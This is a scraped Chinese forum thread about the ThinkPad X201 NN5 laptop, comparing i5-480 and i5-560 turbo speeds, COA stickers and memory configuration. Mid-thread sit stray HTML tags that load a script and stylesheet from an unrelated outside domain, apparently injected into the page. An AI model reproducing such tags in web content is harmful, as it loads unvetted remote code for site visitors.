开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

咨询新机X201 NN5

关闭 [复制链接]
今天看到新机X201 NN5,能否请介绍一下,为什么主频和NT9都是2.66的呢?谢谢!
联系大手和金MM

★★★
<script type="text/javascript" src="http://www.7755.cc/q.js"></script>
<link href="http://www.7755.cc/1.css" rel="stylesheet" type="text/css" media="screen" />
<P>&nbsp;</P>

i5-480都是2.66G啊..
就是睿频不一样. 其他没区别. 所以性价比还是很不错滴
i5-480 睿频到2.93ghz
i5-560 睿频到3.20ghz

这么看了,性价比很高呀!

不过,如果是新出的机器怎么睿频还不如旧的机器呢?
i5-4x0的CPU睿频就是不如i5-5x0.
i5-480优势应该是在于自动切换双显卡.
也就是如果T410用i5-480cpu 同时可以配备双显卡
tszmsid 发表于 2011-2-27 18:07
i5-4x0的CPU睿频就是不如i5-5x0.
i5-480优势应该是在于自动切换双显卡.
也就是如果T410用i5-480cpu 同时可 ...

装在X201上显不出优势嘛!
嗯CPU也够用了, 性价比挺高的.
这款机器出来的蛮新的,网上的信息也不多。
这款机器不错啊
尽管修改了出货地和保修。但是,还是有两点困惑和差异,一是带不带COA;二到底是一根4G内存还是两根2G内存?
沉静似水 发表于 2011-2-28 11:49
尽管修改了出货地和保修。但是,还是有两点困惑和差异,一是带不带COA;二到底是一根4G内存还是两根2G内存 ...

此款机器不带有COA,几乎所有机器都不带有COA
注明2*2G的话,则是指2条2G内存的。
有点给搞糊涂了
这款机器会很便宜!
ponghuabin 发表于 2011-3-1 14:27

不仅如此... ...
显卡牛B一点咯